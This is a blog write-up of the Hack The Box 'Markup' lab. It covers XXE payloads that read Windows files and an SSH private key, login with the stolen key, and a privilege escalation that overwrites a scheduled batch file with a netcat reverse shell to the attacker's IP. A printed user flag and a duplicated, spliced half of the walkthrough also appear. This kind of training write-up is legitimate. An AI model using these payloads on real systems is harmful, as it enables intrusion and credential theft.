The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

Markup: Use XXE Injection and privilege escalation to get the flag

posted on 12.6.2023 by Below Surface in "Hack The Box"

Port scan first, exchange ip with your machines IP address:

sudo nmap -sV ip

Relevant output:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)

Navigate to the website running on port 80 by pasting the machines IP address into your browser. Try a couple default username:password combinations. Work will:

Username: admin
Password: password

The order page is of special interest, because it has input fields on it. Let's fire up BurpSuite to gather more information, how the underlying program works.

burpsuite

In your browser, turn on the proxy in Settings/Proxy on ip 127.0.0.1 and port 8080. Also enable the HTTPS proxy option below. Then in BurpSuite, navigate to the Proxy tab and enable interception, so the button reads "Intercept is on".

Now, BurpSuite should catch all requests from the browser and you need to click on "Forward" to accept the request to go through. Test this, by submitting any data like

Quantity: 12
Address: 12

And this data is included within the intercepted request:

<?xml version = "1.0"?><order><quantity>12</quantity><item>Home Appliances</item><address>12</address></order>

We will try to exploit XML and in the linked resource (book.hacktricks.xyz) we find this for Windows machines:

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

Let's send another post request via the form, catch it with BurpSuite and pass it to the Repeater by pressing

ctrl +r

Then we navigate to the Repeater tab, where we can edit the request to include:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order><quantity>12</quantity><item>&test;</item><address>12</address></order>

Relevant output:

Your order for ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[Ports]
COM1:=9600,n,8,1
 has been processed

This is the content of the win.ini file! So we found out that the target is vulnerable to XML External Entitity Processing (XXE).

Instead of brute forcing a username for finding the files and folders of interest, we inspect the website running on the target system (right click, view page source). And we are lucky, there is a HTML comment "Modified by Daniel ...". So Daniel is the username, we will try now.

In the repeater tab, modify the request to include:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order><quantity>12</quantity><item>&test;</item><address>12</address></order>

Relevant output:

Your order for -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwA..........

Now, copy the full private key and create a local file on your machine called "id_rsa". Then paste the key into it.

sudo mkdir temp
cd temp
sudo nano id_rsa
ctrl + shift + v // to paste
ctrl + o // to save
enter // to confirm
ctrl + x // to close

The file content should look like this:

-----BEGIN OPENSSH PRIVATE KEY-----
key...
-----END OPENSSH PRIVATE KEY-----

Then set the correct privileges to the file:

sudo chmod 400 id_rsa

Then we try to SSH into the target with the username daniel and his private key:

sudo ssh -i id_rsa daniel@ip

This should succeed! Now navigate to the Desktop and output the user flag:

cd Desktop
type user.txt
032d2fc8952a8c24e39c8f0ee9918ef7

Now it's time for privillege escalation!

whoami /priv

Will output:

PRIVILEGES INFORMATION
----------------------
Privilege Name        Description          State
============================= ============================== =======
SeChangeNotifyPrivilege    Bypass traverse checking    Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

But this does not help us. Let's explore the file system now:

cd C:\
cd Log-Management
type job.bat

We see that a file called wevtutil.exe is used to do different tasks on the system, but it can only be run by an Admin. We will try to edit the file at least:

icacls job.bat

We see that the BUILTIN\Users group, which Daniel is part of, has full control (F) over the file. so we will try to get a shell by transferring Netcat to the target system and then modify the job.bat script to execute a reverse shell.

First we check if the wevtutil process is running:

schtasks

Does not work, but we exploit another security misconfiguration of the system:

powershell
ps

Relevant output:

4    2   416     80       1468  1 wevtutil

Now we will transfer the Netcat nc64.exe file from our local machine to the target. Download it from here:

Port scan first, exchange ip with your machines IP address:

sudo nmap -sV ip

Relevant output:

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)

Navigate to the website running on port 80 by pasting the machines IP address into your browser. Try a couple default username:password combinations. Work will:

Username: admin
Password: password

The order page is of special interest, because it has input fields on it. Let's fire up BurpSuite to gather more information, how the underlying program works.

burpsuite

In your browser, turn on the proxy in Settings/Proxy on ip 127.0.0.1 and port 8080. Also enable the HTTPS proxy option below. Then in BurpSuite, navigate to the Proxy tab and enable interception, so the button reads "Intercept is on".

Now, BurpSuite should catch all requests from the browser and you need to click on "Forward" to accept the request to go through. Test this, by submitting any data like

Quantity: 12
Address: 12

And this data is included within the intercepted request:

<?xml version = "1.0"?><order><quantity>12</quantity><item>Home Appliances</item><address>12</address></order>

We will try to exploit XML and in the linked resource (book.hacktricks.xyz) we find this for Windows machines:

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>

Let's send another post request via the form, catch it with BurpSuite and pass it to the Repeater by pressing

ctrl +r

Then we navigate to the Repeater tab, where we can edit the request to include:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order><quantity>12</quantity><item>&test;</item><address>12</address></order>

Relevant output:

Your order for ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[Ports]
COM1:=9600,n,8,1
 has been processed

This is the content of the win.ini file! So we found out that the target is vulnerable to XML External Entity Processing (XXE).

Instead of brute forcing a username for finding the files and folders of interest, we inspect the website running on the target system (right click, view page source). And we are lucky, there is a HTML comment "Modified by Daniel ...". So Daniel is the username, we will try now.

In the repeater tab, modify the request to include:

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order><quantity>12</quantity><item>&test;</item><address>12</address></order>

Relevant output:

Your order for -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwA..........

Now, copy the full private key and create a local file on your machine called "id_rsa". Then paste the key into it.

sudo mkdir temp
cd temp
sudo nano id_rsa
ctrl + shift + v // to paste
ctrl + o // to save
enter // to confirm
ctrl + x // to close

The file content should look like this:

-----BEGIN OPENSSH PRIVATE KEY-----
key...
-----END OPENSSH PRIVATE KEY-----

Then set the correct privileges to the file:

sudo chmod 400 id_rsa

Then we try to SSH into the target with the username daniel and his private key:

sudo ssh -i id_rsa daniel@ip

This should succeed! Now navigate to the Desktop and output the user flag:

cd Desktop
type user.txt

Now it's time for privillige escalation!

whoami /priv

Will output:

PRIVILEGES INFORMATION
----------------------
Privilege Name        Description          State
============================= ============================== =======
SeChangeNotifyPrivilege    Bypass traverse checking    Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

But this does not help us. Let's explore the file system now:

cd C:\
cd Log-Management
type job.bat

We see that a file called wevtutil.exe is used to do different tasks on the system, but it can only be run by an Admin. We will try to edit the file at least:

icacls job.bat

We see that the BUILTIN\Users group, which Daniel is part of, has full control (F) over the file. so we will try to get a shell by transferring Netcat to the target system and then modify the job.bat script to execute a reverse shell.

First we check if the wevtutil process is running:

schtasks

Does not work, but we exploit another security misconfiguration of the system:

powershell
ps

Relevant output:

4    2   416     80       1468  1 wevtutil

Now we will transfer the Netcat nc64.exe file from our local machine to the target. Download it from here:

https://github.com/int0x33/nc.exe/blob/master/nc64.exe

Then navigate to the downloaded file and start a simple Python HTTP server:

cd Downloads
sudo python3 -m http.server 80

Expected output:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Keep this terminal window open and go back to the PowerShell window. There, download the nc64.exe file. Exchange ip with your tun0 inet IP address:

wget http://ip/nc64.exe -outfile nc64.exe
dir // check if the file was downloaded successfully

Expected output:

Mode        LastWriteTime     Length Name
----        -------------     ------ ----
-a----     3/6/2020  1:42 AM      346 job.bat
-a----    6/13/2023 12:57 AM     45272 nc64.exe

Then exit the PowerShell and modify the job.bat script. It is important to run the command from the command line with the user daniel@MARKUP.

But first, start a local Netcat listener in a new terminal window:

sudo nc -lvnp 443

Then modify the file (make sure to fill in your tun0 IP address:

echo C:\Log-Management\nc64.exe -e cmd.exe ip 443 > C:\Log-Management\job.bat

The Netcat listener should output something like:

connect to [10.10.15.4] from (UNKNOWN) [10.129.47.70] 49684
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

Now - from the Netcat terminal - run this command to output the admin flag:

type C:\Users\Administrator\Desktop\root.txt

Tags:

hack the box
xxe injection
ssh
default credentials
arbitrary file upload
python http server
powershell
privilege escalation

Sources:

https://app.hackthebox.com/starting-pointhttps://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entityhttps://github.com/int0x33/nc.exe/blob/master/nc64.exe

More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or psexec.py

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

Get a reverse shell, break out of a Docker container and get the flags

Hack The Box